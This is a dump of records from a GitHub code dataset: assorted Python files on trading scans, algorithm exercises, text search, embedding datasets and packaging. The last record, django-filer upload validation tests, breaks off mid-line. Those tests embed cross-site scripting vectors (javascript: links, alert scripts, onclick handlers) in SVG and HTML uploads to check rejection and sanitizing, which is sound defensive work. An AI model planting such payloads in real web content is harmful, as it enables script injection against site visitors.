Normalize\n amin, amax = min(pair_list), max(pair_list)\n for i, val in enumerate(pair_list):\n pair_list[i] = (val-amin) / (amax-amin)\n\n _ = pair_list\n pair_list = pd.Series(pair_list).rolling(window=n).mean().iloc[n-1:].values\n\n # Take the first derivative\n derv = diff(pair_list)\n\n average = sum(derv[-GETSOME:]) / len(derv[-GETSOME:])\n\n variance = statistics.variance(derv)\n standard_deviation = float(statistics.stdev(derv))\n\n # Nondimentional distance from the moving average\n dMA = sum(_[-GETSOME:]-pair_list[-GETSOME:]) / GETSOME\n\n scanner[pair] = [average, variance, standard_deviation, mean_numberofTrades, dMA]\n # _scanner = scanner\n\n # Sort the resulting according to second index ref on kv (key value). the forth represents distance from moving average.\n sorted_scan = sorted(scanner.items(), key=lambda kv: kv[1][4])\n\n # for i in _scanner:\n # # pp.pprint(scanner[i])\n # ii = [abs(float(iii))**-1 if iii != 0.0 else 0 for iii in _scanner[i] ]\n # _scanner[i] = ii\n # # pp.pprint(scanner[i])\n # # assert 1 == 2\n # sorted_scan_closes_to_zero = sorted(_scanner.items(), key=lambda kv: kv[1][0])\n # print(sorted_scan_closes_to_zero)\n\n # Start printing lists only when we have enough\n if len(sorted_scan) > 10:\n print('LOWEST')\n pp.pprint([i[0] for i in sorted_scan[:10]])\n print('HIGHEST')\n pp.pprint([i[0] for i in sorted_scan[-10:]])\n # print('CLOSEST TO ZERO')\n # pp.pprint([i[0] for i in sorted_scan_closes_to_zero[-10:]])\n else:\n pp.pprint(sorted_scan)\n # pp.pprint(number_of_trades_per_minutes)\n # assert 1 == 2 \n","repo_name":"tristanCB/BinanceTrader","sub_path":"binance_scanner.py","file_name":"binance_scanner.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73447000146","text":"# 전봇대\n\nT = int(input())\nfor TC in range(1, T+1):\n N = int(input())\n Pole = [list(map(int, input().split())) for _ in range(N)]\n # 개수 초기화\n count = 0\n # 전선 교차하는 개수 구하기\n for i in range(N):\n for j in range(N):\n if Pole[i][0] > Pole[j][0] and Pole[i][1] < Pole[j][1]:\n count += 1\n elif Pole[i][0] < Pole[j][0] and Pole[i][1] > Pole[j][1]:\n count += 1\n # 중복되는 전선수 제외하기 위해 2로 나누기\n print(\"#{} {}\".format(TC, count//2))","repo_name":"eunzi-kim/CODE_Practice","sub_path":"SWEA/D3/10580.py","file_name":"10580.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74329260625","text":"import pickle\nimport time\n\nimport gensim\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport nltk\nimport numpy as np\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom selenium import webdriver\nfrom TedTalksFunctions import *\n########################################################\n\ndef search_function(sims, search_words):\n query_doc = [w.lower() for w in word_tokenize(search_words)]\n# print(query_doc) # remove later\n query_doc_bow = dictionary.doc2bow(query_doc)\n# print(query_doc_bow) # remove later\n query_doc_tf_idf = tf_idf[query_doc_bow]\n# print(query_doc_tf_idf) # remove later\n ans = sims[query_doc_tf_idf]\n ind = np.argmax(ans)\n print('INDEX = ', ind)\n return ind\n\n\n# def preprocess(data):\n# lemmatized = [lemmadata(speech) for speech in data]\n# tfidf = pickle.load(open(\"tfidf.pkl\", \"rb\"))\n# transformed = tfidf.transform(lemmatized)\n# tfidf_df = pd.DataFrame(transformed.toarray(), columns=tfidf.get_feature_names())\n# relevant = pickle.load(open(\"relevantwords.pkl\", \"rb\"))\n# testset = [tfidf_df[word] for word in relevant if word in tfidf_df.columns]\n# return pd.DataFrame(testset).transpose()\n\n\ndef classify_text(text, mnb):\n listtext = [text]\n tfidf = pickle.load(open(\"tfidf.pkl\", \"rb\"))\n lemmatized = [lemmadata(speech) for speech in listtext]\n transformed = tfidf.transform(lemmatized)\n tfidf_df = pd.DataFrame(transformed.toarray(), columns=tfidf.get_feature_names())\n relevant = pickle.load(open(\"relevantwords.pkl\", \"rb\"))\n testset = [tfidf_df[word] for word in relevant if word in tfidf_df.columns]\n processed = pd.DataFrame(testset).transpose()\n return mnb.predict(processed)\n\n\nsimple_data = pd.read_pickle('simplified_data.pkl')\nsims = pd.read_pickle('sims.pkl')\npolarity_transcript = pd.read_pickle('polarity_transcript.pkl')\nmnb = pd.read_pickle('mnbb.pkl')\n\n# test out with whole texts from df\nsample_text = simple_data.text.iloc[2]\nprint(sample_text)\nnum = ''\nnum2 = ''\nchoice = ''\nplt.rcParams['figure.figsize'] = [10, 6] # for polarity transcript's display\nwhile num != '1' and num != '2':\n num = input('Enter\\n1 for TEDTalks Search\\n2 for TEDTalks Classifier: ')\n if num == '1':\n while num2 != '1' and num2 != '2':\n num2 = input('Enter\\n1 to Search by Description\\n2 to Search by Speech Transcript: ')\n if num2 == '1':\n choice = 'description'\n elif num2 == '2':\n choice = 'text'\n #search_words = input('Enter Search Term(s): ')\n search_words = sample_text # test queries\n idx = search_function(simple_data[choice], search_words)\n #pd.set_option('max_colwidth', 500)\n\n print(pd.DataFrame(simple_data.iloc[idx].T)) # print result.transposed\n driver = webdriver.Chrome()\n driver.get(simple_data['public_url'].iloc[idx])\n play = driver.find_element_by_xpath('//*[@id=\"plyr-play\"]')\n time.sleep(3)\n play.click()\n # Show the plot for one speech (to be built on top of...)\n plt.plot(polarity_transcript[idx])\n #plt.title(simple_data.headline[ind])\n plt.show()\n elif num == '2':\n search_words = input('Enter Search Term(s): ')\n result = classify_text(search_words, mnb)\n if result == [1]:\n print(\"One of Jay's favorite topics!\")\n else:\n print(\"Not one of Jay's favorite topics\")","repo_name":"jkarma0920/TEDTalksProject","sub_path":"TedTalksProject_Run.py","file_name":"TedTalksProject_Run.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73352975186","text":"from brainscore_core.metrics import Score\n\n\ndef ceiling_normalize(raw_score: Score, ceiling: Score) -> Score:\n # normalize by ceiling, but not above 1\n score = raw_score / ceiling\n score.attrs['raw'] = raw_score\n score.attrs['ceiling'] = ceiling\n if score > 1 or score < 0:\n out_of_range_value = score.item()\n # ideally we would just update the value, but I could not figure out how to update a scalar DataArray\n attrs = score.attrs\n in_range_value = 1 if score > 1 else 0\n score = type(score)(in_range_value, coords=score.coords, dims=score.dims)\n score.attrs = attrs\n score.attrs['original_out_of_range_score'] = out_of_range_value\n return score\n","repo_name":"brain-score/language","sub_path":"brainscore_language/utils/ceiling.py","file_name":"ceiling.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"43416802917","text":"# 연결된 모든 노드의 색을 변경한다..?\r\n# 만약 이미 색칠이 되어 있는데 칠해야하는 색과 다른 색이 칠해져있다면 False를 return하면 될 것.\r\nfrom collections import deque\r\nimport sys\r\ninput = sys.stdin.readline\r\nT = int(input())\r\nfor test_case in range(T):\r\n n,m = map(int,input().split())\r\n graph = {i+1 :[] for i in range(n)}\r\n # paint_color = [False for _ in range(n+1)]\r\n # print(graph)\r\n for _ in range(m):\r\n x,y = map(int,input().split())\r\n graph[x].append(y)\r\n graph[y].append(x)\r\n visited = [-1 for _ in range(n+1)]\r\n try:\r\n DEFAULT_COLOUR = True\r\n while -1 in visited[1:]:\r\n root_index = visited[1:].index(-1) + 1\r\n queue = deque([(root_index,DEFAULT_COLOUR)])\r\n # print(queue)\r\n while queue:\r\n if -1 not in visited[1:]: # 무한루프 방지\r\n break\r\n node, color = queue.popleft()\r\n # queue.(graph[node])\r\n for child in graph[node]:\r\n if visited[child] == -1:\r\n queue.append((child,not color))\r\n elif visited[child] == color:\r\n raise()\r\n if visited[node] != -1 and visited[node] != color: # 불가능할때의 조건\r\n raise()\r\n visited[node] = color\r\n print(\"possible\")\r\n except:\r\n print(\"impossible\")","repo_name":"Guitarboyjason/Algorithm","sub_path":"백준/Gold/13265. 색칠하기/색칠하기.py","file_name":"색칠하기.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16938296323","text":"#!/usr/bin/python3\n\"\"\"Create a class of complex square\"\"\"\n\n\nclass Square:\n \"\"\"Define a square\"\"\"\n def __init__(self, size=0, position=(0, 0)):\n\n \"\"\"Initialize the size of the square, raises TypeError\n if size is not an int\n Args:\n size: the size of the square\"\"\"\n self.size = size\n self.__position = position\n self.position = position\n\n def area(self):\n \"\"\"Compute the area of the square\n Return: the area of the square\"\"\"\n\n return self.__size**2\n\n @property\n def position(self):\n \"\"\"Return the tuple whose value is in protected value position\"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"Set/change the value of the variable in position\n Args:\n value: the value of the position field; it must be a tuple\n Raise:\n TypeError - if the variable is not tuple\n \"\"\"\n if not isinstance(value, tuple):\n raise TypeError('position must be a tuple of 2 positive integers')\n if len(value) != 2:\n raise TypeError('position must be a tuple of 2 positive integers')\n if not isinstance(value[0], int) or not isinstance(value[1], int):\n raise TypeError('position must be a tuple of 2 positive integers')\n if value[0] < 0 or value[1] < 0:\n raise TypeError('position must be a tuple of 2 positive integers')\n self.__position = value\n\n @property\n def size(self):\n \"\"\"Return the value stored in variable size\"\"\"\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"change the value stored in private variable size\n Args:\n value: new value of size\n \"\"\"\n if type(value) is not int:\n raise TypeError('size must be an integer')\n elif value < 0:\n raise ValueError('size must be >= 0')\n self.__size = value\n\n def my_print(self):\n \"\"\"Print the square out using '#'\"\"\"\n i = 0\n while i < self.size:\n j, x = 0, 0\n for a in range(0, self.position[1]):\n print(\"\")\n if self.position[1] <= 0:\n while x < self.position[0]:\n print(\" \", end=\"\")\n x += 1\n\n while j < self.size:\n print(\"#\", end=\"\")\n j += 1\n print(\"\")\n i += 1\n\n if self.__size == 0:\n print(\"\")\n","repo_name":"Sonlowami/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1340976856","text":"# -*- coding: utf-8 -*-\n\"\"\"\nauthor:rhelenius\n\"\"\"\n\nfrom lxml import etree\nfrom spellchecker import SpellChecker\nimport re\n\ndef spellcheck_workbook(wbname):\n '''\n This will take in a workbook and check titles and text box objects for spelling errors. If errors are found\n it will tell you the text string, which word was flagged and where it was located. It is currently avoiding\n processing tooltips because of their messy representation in the XML, but may be implemented later.\n '''\n #Read workbook xml and instatiate spellchecker\n tree = etree.parse(wbname)\n root = tree.getroot()\n spell = SpellChecker()\n\n def find_errors(objecttype):\n '''\n This will take in a object type to find the element, parent path to get attributes from, and checks their \n spelling for errors. Right now it supports dashboards or worksheets. In the future this could be expanded \n to include additional types of objects/paths.\n '''\n elempath = './/dashboard/zones//formatted-text/run' if objecttype == 'textbox' else './/worksheet//title/formatted-text/run'\n elemparent = 'ancestor::dashboard' if objecttype == 'textbox' else 'ancestor::worksheet'\n for w in root.findall(elempath):\n elemtype = 'dashboard' if objecttype == 'dashboard' else 'worksheet'\n words = re.sub(r'[^\\w\\s]','',w.text)\n misspelled_ws = spell.unknown(words.split())\n if len(misspelled_ws) > 0:\n print('{} text: '.format(objecttype) + w.text)\n for word in misspelled_ws:\n print('Flagged word: ' + word)\n print('Suggested replacement: ' + spell.correction(word))\n for parent in w.xpath(elemparent):\n print('Found in {}: '.format(elemtype) + parent.attrib['name'])\n print('\\n')\n\n #let's call find_errors for worksheets and dashboards\n find_errors('title')\n find_errors('textbox')","repo_name":"gembox/TableauFunctions","sub_path":"spellcheck_workbook.py","file_name":"spellcheck_workbook.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4033548643","text":"#!/usr/bin/python3\n\nfrom CodeGenerator import *\nfrom argparse import *\nfrom os import system\n\nargp = ArgumentParser()\nargp.add_argument(\"-f\", help=\"File\", dest=\"src_name\")\nargp.add_argument(\"-o\", help=\"Output C filename\", default='out.c', dest=\"out_name\")\nargp.add_argument(\"-b\", help=\"Begin offset\", default=0, dest=\"begin_off\")\nargp.add_argument(\"-e\", help=\"End offset\", default=0, dest=\"end_off\")\nargp.add_argument(\"-use-flags\", help=\"Select flags to use\", default='czao', dest=\"flags_used\")\n\n\nargs = vars(argp.parse_args())\n\nfilename = args['src_name']\nflagsUsed = [x for x in args['flags_used']]\nbegin, end = (int(args['begin_off'], 16), int(args['end_off'], 16) )\n\nif filename == None:\n argp.print_help()\n exit(0)\n\ncg = CodeGenerator(filename, begin, end, flagsUsed)\n\ncCode = cg.getAsC()\n\nout = open('out.c', 'wb')\nout.write(bytes(cCode, encoding='ascii'))\nout.close()\n\nprint('==== translated... ====')\nprint(cCode)\n\n#system(\"gcc out.c -o out\")\n\n\n\n\n","repo_name":"rdbv/cisol","sub_path":"cisol.py","file_name":"cisol.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"48"} +{"seq_id":"22350086739","text":"\"\"\"\nutils for processing datasets of format described in https://github.com/iejMac/clip-video-encode/pull/13\n\nused https://github.com/rom1504/laion-prepro/blob/main/laion5B/usage_guide/dataloader_pytorch.py as template\n\"\"\"\n\nimport io\nimport json\n\nimport numpy as np\nimport open_clip\nimport torch\nimport webdataset as wds\n\nfrom torch.utils.data import DataLoader\n\n\ndef standardize_embedding_shape(emb, seq_len):\n if len(emb) > seq_len:\n print(f\"Warning: Raw embedding is longer than standard sequence length ({len(emb)} > {seq_len})\")\n emb = emb[:seq_len]\n\n pad = np.zeros((seq_len - len(emb), emb.shape[1]), dtype=emb.dtype)\n zero_mask = np.concatenate([np.ones(len(emb)), np.zeros(len(pad))])\n padded_emb = np.concatenate([emb, pad])\n return padded_emb, zero_mask\n\n\ndef create_embeddingwebdataset(\n urls,\n embedding_transform=lambda emb: emb,\n standard_seq_len=-1,\n to_tensor=True,\n enable_text=True,\n enable_meta=True,\n):\n \"\"\"\n Create a WebDataset reader for Frame Embedding Dataset\n\n Input:\n standard_seq_len: sequence length to pad all embedding sequences to (for batching)\n !(-1) : pad to standard_seq_len\n -1: don't pad (dataset can't be used in DataLoader with batch_size > 1)\n enable_text: include text captions\n enable_meta: include metadata\n \"\"\"\n\n dataset = wds.WebDataset(urls)\n # TODO: different tokeinzers??\n def tokenizer(text):\n return open_clip.tokenize([text])[0]\n\n def preprocess_dataset(item):\n output = {}\n\n npy_data = item[\"npy\"]\n stream = io.BytesIO(npy_data)\n emb = np.lib.format.read_array(stream)\n\n if standard_seq_len != -1:\n emb, zero_mask = standardize_embedding_shape(emb, standard_seq_len)\n output[\"zero_mask\"] = zero_mask\n if to_tensor:\n emb = torch.from_numpy(emb)\n\n output[\"embeddings\"] = embedding_transform(emb)\n\n if enable_text:\n text_data = item[\"txt\"]\n text = text_data.decode(\"utf-8\")\n output[\"text\"] = text\n output[\"text_tokens\"] = tokenizer(text)\n if enable_meta:\n meta_data = item[\"json\"]\n meta = json.loads(meta_data)\n # meta = meta_data.decode(\"utf-8\")\n output[\"meta\"] = meta\n return output\n\n transformed_dataset = dataset.map(preprocess_dataset, handler=wds.handlers.warn_and_continue)\n return transformed_dataset\n\n\ndef dataset_to_dataloader(dataset, batch_size, num_prepro_workers):\n \"\"\"converts WebDataset to PyTorch DataLoader.\"\"\"\n\n dl = DataLoader(\n dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=num_prepro_workers,\n pin_memory=True,\n prefetch_factor=2,\n )\n\n return dl\n\n\nclass EmbeddingWebDatasetReader:\n \"\"\"WebDataset reader for Embedding Datasets\"\"\"\n\n def __init__(\n self,\n urls,\n standard_seq_len,\n batch_size,\n num_prepro_workers,\n to_tensor=True,\n enable_text=True,\n enable_meta=False,\n embedding_transform=lambda emb: emb,\n ):\n self.batch_size = batch_size\n dataset = create_embeddingwebdataset(\n urls,\n embedding_transform,\n standard_seq_len,\n to_tensor,\n enable_text,\n enable_meta,\n )\n self.dataloader = dataset_to_dataloader(dataset, batch_size, num_prepro_workers)\n\n def __iter__(self):\n for batch in self.dataloader:\n yield batch\n","repo_name":"iejMac/clip-video-encode","sub_path":"clip_video_encode/dataset/dataset_reader.py","file_name":"dataset_reader.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"48"} +{"seq_id":"30331394688","text":"import collections\nimport itertools\n\n\ndef main(text, simple):\n lines = text.splitlines()\n if simple:\n S = lambda line: {v for v in collections.Counter(line).values()}\n a, b = zip(*[(2 in s, 3 in s) for line in lines for s in [S(line)]])\n print(sum(a) * sum(b))\n else:\n for A, B in itertools.combinations(lines, 2):\n same = ''.join(a for a, b in zip(A, B) if a == b)\n if len(A) - len(same) == 1:\n print(same)\n return\n","repo_name":"RodericDay/advent2018","sub_path":"y2018/p02.py","file_name":"p02.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30464713782","text":"# Este codigo ha sido generado por el modulo psexport 20180802-w32 de PSeInt.\r\n# Es posible que el codigo generado no sea completamente correcto. Si encuentra\r\n# errores por favor reportelos en el foro (http://pseint.sourceforge.net).\r\n\r\n\r\nif __name__ == '__main__':\r\n\t# Descripcion: progama que lee nombre del usuario, horas trabajadas, precio de la hora e impuestos a pagar y da como resultado el salario bruto y el salario neto.\r\n\t# Desarrollado por: Juan Martin Betancur //\r\n\t# Version 1.0 //\r\n\t# Fecha ultima actualizacion: 25/02/2023 // \r\n\t# AREA DEFINICION DE VARIABLES //\r\n\thorat = float()\r\n\tpreciot = float()\r\n\timpue = float()\r\n\tsalariob = float()\r\n\ttasas = float()\r\n\tsalarion = float()\r\n\t# AREA DE CAPTURA DE DATOS //\r\n\tprint(\"escriba su nombre: \")\r\n\tnom = input()\r\n\tprint(\"digite la cantidad de horas trabajadas: \")\r\n\thorat = float(input())\r\n\tprint(\"Digite el precio de la hora trabajada: \")\r\n\tpreciot = float(input())\r\n\tprint(\"Digite el porcentaje del valor de los impuestos: \")\r\n\timpue = float(input())\r\n\t# AREA DE CALCULOS // \r\n\tsalariob = (horat*preciot)\r\n\ttasas = (impue*salariob)\r\n\tsalarion = (salariob-tasas)\r\n\t# AREA DE SALIDA //\r\n\tprint(nom,\" Su salario neto es de: \",salarion,\" pesos\")\r\n\r\n","repo_name":"juamar07/fundamentos-programacion","sub_path":"Python/problema_1 fp.py","file_name":"problema_1 fp.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4669117484","text":"import numpy as np\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass BingoSet:\n numbers: set\n val: int = 0\n\n\nclass BingoBoard:\n def __init__(self, board: np.ndarray):\n self.board = board\n self.numbers = set(board.flatten())\n self.drawn = set()\n self.win = len(board)\n\n # diag1 = board.diagonal()\n # diag2 = np.fliplr(board).diagonal()\n # bingosets = [BingoSet(set(diag1)), BingoSet(set(diag2))]\n bingosets = []\n\n for row in board:\n bingosets.append(BingoSet(set(row)))\n\n for col in board.transpose():\n bingosets.append(BingoSet(set(col)))\n\n self.bingosets = bingosets\n\n def check_win(self):\n return any(bingoset.val >= self.win for bingoset in self.bingosets)\n\n def add_number(self, number):\n self.drawn.add(number)\n for bingoset in self.bingosets:\n bingoset.val += 1 if number in bingoset.numbers else 0\n\n def calc_score(self, win_number):\n return sum(self.numbers - self.numbers.intersection(self.drawn)) * win_number\n\n\ndef setup_bingo(fn):\n with open(fn, \"r\") as f:\n numbers_drawn = f.readline().strip().split(\",\")\n rest = f.read()\n\n numbers_drawn = [int(drawn) for drawn in numbers_drawn]\n boards = rest.split(\"\\n\\n\")\n\n board_list = []\n for board_raw in boards:\n board = []\n rows = board_raw.split(\"\\n\")\n for row in rows:\n row = row.split()\n row = [int(numb) for numb in row]\n if row:\n board.append(row)\n\n bingo_board = BingoBoard(np.array(board))\n board_list.append(bingo_board)\n\n return numbers_drawn, board_list\n\n\ndef play_bingo(fn):\n numbers_drawn, board_list = setup_bingo(fn)\n\n for number in numbers_drawn:\n for board in board_list:\n board.add_number(number)\n if board.check_win():\n print(f\"Score: {board.calc_score(number)}, winning number: {number}\")\n return\n\n print(\"NO ONE WON\")\n\n\ndef play_bingo_p2(fn):\n numbers_drawn, board_list = setup_bingo(fn)\n\n needed_wins = len(board_list)\n current_wins = 0\n board_list = [[board, 0] for board in board_list]\n\n for number in numbers_drawn:\n for i, (board, has_win) in enumerate(board_list):\n board.add_number(number)\n if not has_win and board.check_win():\n current_wins += 1\n board_list[i][1] = 1\n\n if current_wins == needed_wins:\n print(f\"Score: {board.calc_score(number)}, winning number: {number}\")\n return\n\n print(\"NO ONE WON\")\n","repo_name":"ProgHaj/AdventOfCode2021","sub_path":"4/bingo.py","file_name":"bingo.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9599454402","text":"import os\n\nfrom . import env\nfrom . import gbp\n\n\ndef get_branch(repo, dist, dist_id=None):\n # see if config-file gives a branch:\n option = '%s-branch' % dist\n if gbp.has_option(option):\n branch_name = gbp.get(option)\n if hasattr(repo.heads, branch_name):\n return getattr(repo.heads, branch_name)\n else:\n raise RuntimeError('%s: Branch does not exist.' % branch_name)\n\n # see if dist-name branch exists:\n if hasattr(repo.heads, dist):\n print(\"WARNING: branches are deprecated. \"\n \"Use / instead\")\n return getattr(repo.heads, dist)\n if dist_id:\n branchname = '%s/%s' % (dist_id, dist)\n if hasattr(repo.heads, branchname):\n return getattr(repo.heads, branchname)\n if hasattr(repo.heads, 'debian/%s' % dist):\n return getattr(repo.heads, 'debian/%s' % dist)\n if hasattr(repo.heads, 'ubuntu/%s' % dist):\n return getattr(repo.heads, 'ubuntu/%s' % dist)\n\n return None\n\n\ndef get_version(dist):\n \"\"\"Get the version to build for the given distribution.\"\"\"\n\n changelog_fields = env.get_changelog_fields()\n version = changelog_fields['version']\n\n if gbp.getboolean('append-dist'):\n release = env.get_release(dist)\n\n if release:\n return True, '%s~%s' % (version, release)\n\n return False, version\n\n\ndef postexport_cmds(dist):\n cmds = []\n env.test_dir()\n\n update, version = get_version(dist)\n if update:\n regex = '1s/(.*)/(%s)/' % version\n cmds.append('sed -i \"%s\" debian/changelog' % regex)\n\n return cmds\n\n\ndef get_changes_file(dist, arch):\n changelog_fields = env.get_changelog_fields()\n version = get_version(dist)[1]\n if ':' in version: # epoch is not part of the changes file\n version = version.split(':', 1)[1]\n\n changes = '%s_%s_%s.changes' % (changelog_fields['package'], version, arch)\n path = os.path.join(os.path.expanduser('~/build'), '%s-%s' % (dist, arch))\n return os.path.join(path, changes)\n","repo_name":"mathiasertl/dpkg-scripts","sub_path":"dpkg/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11656739644","text":"# Given an array of n positive integers. Write a program to find the sum of maximum sum subsequence of the given array such that the integers in the subsequence are sorted in increasing order.\n\n# Input:\n\n# The first line of input contains an integer T denoting the number of test cases.\n# The first line of each test case is N,N is the size of array.\n# The second line of each test case contains N input A[].\n\n# Output:\n\n# Print the sum of maximum sum sequence of the given array.\n\n# Constraints:\n\n# 1 ≤ T ≤ 100\n# 1 ≤ N ≤ 100\n# 1 ≤ A[] ≤ 1000\n\n# Example:\n\n# Input:\n# 2\n# 7\n# 1 101 2 3 100 4 5\n# 4\n# 10 5 4 3\n\n# Output:\n# 106\n# 10\n\n# Explanation:\n# For input:\n# 7\n# 1 101 2 3 100 4 5\n# All the increasing subsequences : (1,101); (1,2,3,100); (1,2,3,4,5), out of this (1,2,3,100) has maximum sum,i.e., 106. Hence the output is stated as 106.\n\ndef maximum_sum_subsequence(arr,n):\n \n subsequence_sum = [0]*len(arr)\n for i in range(0,n):\n if i == 0 :\n subsequence_sum[i] = arr[i]\n continue\n j = i-1\n subsequence_sum[i] = arr[i]\n while(j>-1):\n if arr[j]subsequence_sum[i]:\n subsequence_sum[i] = subsequence_sum[j]+arr[i]\n j = j-1\n return max(subsequence_sum)\n \n\nt = int(input())\n\nfor i in range(0,t):\n n = int(input())\n arr = [int(x) for x in input().strip().split(\" \")]\n print(maximum_sum_subsequence(arr,n))","repo_name":"amitkmr/coding-questions","sub_path":"Arrays/maximum_sum_increasing_subsequence.py","file_name":"maximum_sum_increasing_subsequence.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"31728470397","text":"import json\n\n\nclass local_str:\n def __init__(self, lang: str = \"en\", main_path: str = \"./\"):\n self.lang = lang\n self.main_path = main_path\n pass\n\n def load_data(self, data):\n for key in data:\n self.__setattr__(key, data[key])\n\n def __setattr__(self, name, val):\n super().__setattr__(name, val)\n\n def __getattr__(self, name):\n \"If the attribute is not loaded, return the value in English.\"\n\n with open(f\"{self.main_path}/localizations/en.json\") as f:\n data = json.load(f)\n return data[name]\n\n\ndef localized_str(lang: str, main_path: str) -> local_str:\n localized = local_str(lang, main_path)\n try:\n with open(f\"{main_path}/localizations/{lang}.json\", encoding=\"utf-8\") as f:\n data = json.load(f)\n localized.load_data(data)\n except FileNotFoundError:\n with open(f\"{main_path}/localizations/en.json\") as f:\n data = json.load(f)\n localized.load_data(data)\n return localized\n","repo_name":"Jim137/Tenhou-Paifu-Logger","sub_path":"paifulogger/src/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"20827423002","text":"import json\nimport os\n\nimport django.core\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.utils.crypto import get_random_string\n\nfrom filer.models import File, Folder\nfrom filer.validation import FileValidationError, validate_upload, sanitize_svg\nfrom tests.helpers import create_superuser\n\n\nclass TestValidators(TestCase):\n\n def setUp(self) -> None:\n self.superuser = create_superuser()\n self.client.login(username='admin', password='secret')\n self.folder = Folder.objects.create(name='foo')\n\n def tearDown(self) -> None:\n self.folder.delete()\n\n svg_file = \"\"\"\n\n\n \n {}\n\"\"\"\n\n def test_html_upload_fails(self):\n html_file = 'test_file.html'\n filename = os.path.join(\n settings.FILE_UPLOAD_TEMP_DIR,\n html_file\n )\n\n with open(filename, 'wb') as fh:\n fh.write(b\"\")\n self.assertEqual(File.objects.count(), 0)\n\n with open(filename, 'rb') as fh:\n file_obj = django.core.files.File(fh)\n url = reverse('admin:filer-ajax_upload', kwargs={'folder_id': self.folder.pk})\n post_data = {\n 'Filename': html_file,\n 'Filedata': file_obj,\n 'jsessionid': self.client.session.session_key\n }\n response = self.client.post(url, post_data)\n\n self.assertContains(response, \"HTML upload denied by site security policy\")\n self.assertEqual(File.objects.count(), 0)\n\n def test_svg_upload_fails(self):\n for attack, expected_files in [\n (\"\"\"test\"\"\", 0),\n ('', 0),\n (\"\"\"\"\"\", 0),\n (\"\", 1)\n ]:\n svg_file = 'test_file.svg'\n filename = os.path.join(\n settings.FILE_UPLOAD_TEMP_DIR,\n svg_file\n )\n\n # create svg file with attack vector\n with open(filename, 'w') as fh:\n fh.write(self.svg_file.format(attack))\n n = File.objects.count()\n\n with open(filename, 'rb') as fh:\n file_obj = django.core.files.File(fh)\n url = reverse('admin:filer-ajax_upload', kwargs={'folder_id': self.folder.pk})\n post_data = {\n 'Filename': svg_file,\n 'Filedata': file_obj,\n 'jsessionid': self.client.session.session_key\n }\n response = self.client.post(url, post_data)\n if expected_files == 0:\n self.assertContains(response, \"Rejected due to potential cross site scripting vulnerability\")\n self.assertEqual(File.objects.count(), n + expected_files)\n\n def test_deny_validator(self):\n from filer.validation import deny\n\n self.assertRaisesRegex(\n FileValidationError,\n \"HTML upload denied by site security policy\",\n deny,\n \"test.html\",\n None,\n None,\n \"text/html\",\n )\n\n self.assertRaisesRegex(\n FileValidationError,\n \"MY_FUNNY_EXT upload denied by site security policy\",\n deny,\n \"test.my_funny_ext\",\n None,\n None,\n \"text/html\",\n )\n\n self.assertRaisesRegex(\n FileValidationError,\n \"Upload denied by site security policy\",\n deny,\n \"test\",\n None,\n None,\n \"text/html\",\n )\n\n def test_svg_sanitizer(self):\n config = apps.get_app_config(\"filer\")\n svg_validation = config.FILE_VALIDATORS[\"image/svg+xml\"]\n config.FILE_VALIDATORS[\"image/svg+xml\"] = [sanitize_svg]\n for attack, disallowed in [\n (\"\"\"test\"\"\", \"javascript:\"),\n ('', \"alert\"),\n (\"\"\"\"\"\", \"onclick\"),\n ]:\n svg_file = 'test_file.svg'\n filename = os.path.join(\n settings.FILE_UPLOAD_TEMP_DIR,\n svg_file\n )\n\n # create svg file with attack vector\n with open(filename, 'w') as fh:\n fh.write(self.svg_file.format(attack))\n\n with open(filename, 'rb') as fh:\n file_obj = django.core.files.File(fh)\n url = reverse('admin:filer-ajax_upload', kwargs={'folder_id': self.folder.pk})\n post_data = {\n 'Filename': svg_file,\n 'Filedata': file_obj,\n 'jsessionid': self.client.session.session_key\n }\n response = self.client.post(url, post_data)\n file_id 